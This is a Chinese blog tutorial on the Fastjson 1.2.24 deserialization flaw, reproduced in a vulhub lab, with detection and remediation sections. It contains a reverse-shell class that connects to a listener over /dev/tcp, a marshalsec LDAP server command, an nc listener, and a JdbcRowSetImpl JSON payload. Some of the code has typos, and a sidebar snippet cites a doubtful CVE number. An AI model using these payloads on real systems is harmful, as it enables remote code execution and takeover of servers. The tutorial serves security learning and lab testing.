Fastjson反序列化漏洞原理与复现

已于 2023-05-15 19:13:29 修改
阅读量2.7k 收藏 6
点赞数
分类专栏: # 反序列化 HVV 文章标签: 网络安全 fastjson java
于 2023-05-15 11:14:53 首次发布
本文博主FisrtBqy。文章内容仅供学习交流,未经允许请勿用于论文写作、竞赛答辩、书刊出版、商业活动等。如有问题请联系作者:[email protected]
本文链接:https://blog.csdn.net/FisrtBqy/article/details/130680541
版权

Fastjson反序列化漏洞原理与复现

1 漏洞介绍

1.1 Fastjson简介

Fastjson是java的一个库,可以将Java对象转化为json格式的字符串,也可以将json格式的字符串转化为Java对象。

Fastjson提供了toJSONString()parseObject()方法来将Java对象与JSON相互转换。调用toJSONString()方法即可将对象转换成 JSON 字符串,parseObject()方法则反过来将JSON字符串转换成对象。

1.2 漏洞原理

在反序列化的时候,会进入parseField()方法,进入该方法后,就会调用setValue(object, value)方法,在这里,会执行构造的恶意代码,最后造成代码执行。

首先需要指定一个恶意类,以让Java程序获取后进行反序列化操作。然后将需要执行的代码提供给程序,这里可使用LDAP或RMI协议。 然后反序列化的时候会去请求LDAP/RMI服务器,与Log4j漏洞利用类似,加载这个恶意类文件从而引发代码执行漏洞。

2 复现流程

fastjson版本<1.2.24 <1.2.27

序列化时会调用成员变量的get方法,私有成员变量不会被序列化。

反序列化时,会调用成员变量的set方法,public修饰的成员全部自动赋值。

2.1 环境搭建

vulhub靶场

#1 下载靶场
git clone https://github.com/vulhub/vulhub.git
cd vulhub/fastjson/1.2.24-rce
#2 编译,运行
docker-compose build
docker-compose up -d
#3 查看IP和端口
docker-compose ps
docker ps
#4 关闭靶场
docker-compose down

这里进入vulhub目录太慢了,而且路径也容易记错。可以篡改系统命令,添加命令别名。

vim ~/.bashrc
#在合适的位置添加如下语句
alias vulhub='cd /var/local/soft/vulhub;ls'
#保存并退出
source ~/.bashrc

靶机:centos 192.168.131.121

监听主机:Kali 192.168.131.134:9999

其他环境与Log4j相同——http://t.csdn.cn/l1xmR

2.2 测试

LDAP服务器中,执行如下代码

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.101.128:2222/#GetShell 1234

其中getshell是恶意类的类名,1234是监听的端口号,该工具可以启动JNDI或RMI接口。

当命令行显示Listening on 0.0.0.0:1234时表示服务开启成功。

构建一个恶意类GetShell.class

/*
 * getshell.java
 * 将其编译后生成Exploit.class
 * 上传到HTTP服务器
 */
public class GetShell{
    public GetShell(){
        Runtime.getRuntime.exec("bash -i >&/dev/tcp/192.168.101.134/9999 0>&1");//监听主机的IP和端口号
    }
    public static void main(Sring[] args){
        GetShell e = new GetShell();
    }
}
//直接使用静态代码块亦可

监听主机Kali开启监听:

nc -lvp 9999      # 9999是监听反弹shell的端口

这时,可以向靶场环境以POST的方式发送数据(payload)如下

POST /HTTP/1.1
Host:xxxxxxxx
...
Content-Type:application/json
Content-Length:146
{
	"x":{
		"@type":"com.sun.rowset.JdbcRowSetImpl",
		"dataSourceName":"ldap://192.168.101.133:1234/GetShell",
		"autoCommit":true
	}
}

反弹shell成功即可。

2.3 过程分析

用到的反序列化方法

//返回实际类型的对象
Object returnObj = JSON.parseObject(serializedStr,returnObject.class);
//返回JsonObject对象
Object obj = JSON.parse(serializedStr);

//子类中包含接口或抽象类时,类型丢失
{"@type":"com.xxx.User","age":2,"flag":false,"name":"zhangsan"}

利用类

com.sun.rowset.JdbcRowSetImpl

使用时会引入一个dataSourceName支持传入一个rmi数据源,可以实现JNDI、LDAP端口注入攻击。

流程

序列化字符:准备类名、dataSourceName属性和autoCommit属性;

JdbcRowSetImpl反序列化,调用JdbcRowSetImpl的setAutoCommit(),setAutoCommit()调用connect();

connect()调用lookup()链接到LDAP/RMI服务器,下载恶意代码到本地,执行攻击。

3 漏洞防御

3.1 排查方法

  1. 找到发送JSON序列化数据的接口

  2. 抓包判断是否使用fastjson

  3. 传入不完整或错误的json数据,{“xx”:"查看返回的数据是否暴露

  4. 使用dnslog ceye检测

    package src;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
public class FastTest {
    public static void main(String[] args) {
        String json1="{\"zeo\":
{\"@type\":\"java.net.Inet4Address\",\"val\":\"aaa.fooe50.ceye.io\"}}";
        JSONObject jsonObject= JSON.parseObject(json1);
   }
}

    fastjson1.2.67以后的版本

    {"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
畸形:
{"@type":"java.net.InetSocketAddress"{"address":,"val":"这⾥是dnslog"}}

  5. 使用Burp插件

3.2 漏洞修复

  1. 升级JDK
  2. 升级Fastjson到最新版
  3. 使用安全产品过滤
  4. 更换其他序列化工具Jackson/Gson
FisrtBqy
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
03-02
fastjson1.2.75暂未修补的反序列化漏洞“-附件资源
Fastjson反序列化漏洞
m0_67401761的博客
09-11 1万+
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
复现fastjson反序漏洞(fastjson≤1.2.80)
TVT111的博客
07-21 2044
文章利用JNDI-Injection-Exploit工具,主要讲解如何利用JNDI注入复现fastjson反序漏洞
Fastjson漏洞利用合集
最新发布
2301_76786857的博客
03-07 1221
FastJson 是Alibaba 的一款开源Json解析库,可用于将Java 对象转换为其Json 表示形式,也可以用于将Json 字符串转换为等效的Java 对象。近几年来FastJson 漏洞层出不穷。RCE漏洞的源头:17年FastJson 爆出的1.2.24 反序列化漏洞
Fastjson反序列化漏洞史1
08-03
Fastjson 反序列化漏洞史2020年05月08日漏洞分析 (/category/vul-analysis/) · 404专栏 (/category/404
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
![img](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Fastjson/Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/PIC/index.png) # Fastjson<=1.2.47反序列化漏洞为例 1、此时/tmp目录 ![img](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Fastjson/Fastjson%E5%90%84%E7%89%88%E6%9C%AC%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/PIC/tmp.png) 2、编译Exploit.java javac
Fastjson反序列化漏洞原理漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-12 2万+
本文是Fastjson1.2.24漏洞复现,包括漏洞原理漏洞利用(远程创建文件)、漏洞利用(反弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
Fastjson漏洞原理分析
LTianHang的博客
06-04 3553
fastjson中产生漏洞的根本原因在于其autoType机制,以及针对于autoType机制做的checkAutoType检测防御机制。
FastJson 反序列化漏洞原理分析
buffedon的博客
08-01 8523
FastJson 反序列化漏洞原理分析FastJson 简介漏洞原理FastJson 序列操作序列反序列化调用链分析原理利用过程分析RMI 的实现JNDI服务器端代码构造总结1. fastjson 利用过程2. 恶意类怎么上传到服务端3. fastjson rce的原理参考 FastJson 简介 fastjson框架下载:https://github/alibaba/fastjson fastjson-jndi 下载:https://github.com/earayu/fastjson_jndi_po
Java反序列化漏洞总结【fastjson为例】
z69183787的专栏
01-06 1407
前言 前段时间FastJson被曝高危漏洞,其实之前也被报过类似的漏洞,只是项目中没有使用,所以一直也没怎么关注;这一次刚好有项目用到FastJson,打算对其做一个分析。 漏洞背景 2020年05月28日, 360CERT监测发现业内安全厂商发布了[Fastjson远程代码执行漏洞](https://cert.360.cn/warning/detail?id=af8fea5f165df6198033de208983e2ad)的风险通告,漏洞等级:高危。Fastjson是阿里巴巴的开源JSON解析库,
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2109
Fastjson反序列化漏洞复现
springmvc fastjson 反序列化时间格式方法(推荐)
10-20
下面小编就为大家带来一篇springmvc fastjson 反序列化时间格式方法(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
FastjsonScan:一个简单的Fastjson反序列化检测burp插件
04-13
FastjsonScan 一个简单的Fastjson反序列化检测burp插件 我在挖洞的时候看到一些json请求总是想要检测一下有没有Fastjson反序列化问题,本可以直接写一个脚本来跑或者搭配其他被动扫描器来验证,但是我太懒了,先不说burp搭配其他扫描器了,就连找到特定目录下的脚本我都觉得麻烦,所以,我决定一劳永逸地解决这个问题,于是去学习了一下burp插件的写法糊弄出了这个插件 安装方法 下载项目中的FastjsonScan.jar文件 在burp的Extender->Extensions栏,点击Add,选择下载好的jar文件就可以了(执行环境是Java) 如果成功安装,会输出如下信息,如果未能成功安装可以换下jdk版本??我用的1.8 使用方法 使用方法也很简单,就像使用repeater一样,你可以在burp的任何地方选中一个请求右键选择【Send to FastjsonScan
.NET高级代码审计(第四课) JavaScriptSerializer反序列化漏洞1
08-03
云影实验室.NET 高级代码审计(第四课) JavaScriptSerializer 反序列化漏洞Ivan1ee@360 云影实验室2019 年 03 月 01
FastJson.java
09-04
com.alibaba.fastjson.JSON读写json
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) Fastjson(JSON) Genson(JSON) ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8190
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
fastjson 漏洞
09-02
你想了解有关 fastjson 漏洞的信息吗?fastjson 是一个流行的 Java JSON 库,但在过去的一段时间里,它曾经存在一些安全漏洞。其中最著名的是 fastjson 1.2.24 版本以下的版本中的反序列化漏洞(CVE-2020-1948),该漏洞允许攻击者通过构造恶意 JSON 数据来执行任意代码。 这个漏洞的修复版本是 fastjson 1.2.24,如果你使用的是较早版本的 fastjson,请升级到最新版本以确保安全。此外,你还应该注意其他安全最佳实践,如避免将不受信任的 JSON 数据直接反序列化Java 对象,并确保对 fastjson 库进行及时的更新和升级。 如果你需要更多关于 fastjson 漏洞的详细信息,我建议你参考 CSDN 或其他可靠的安全资源,了解最新的安全建议和补丁信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值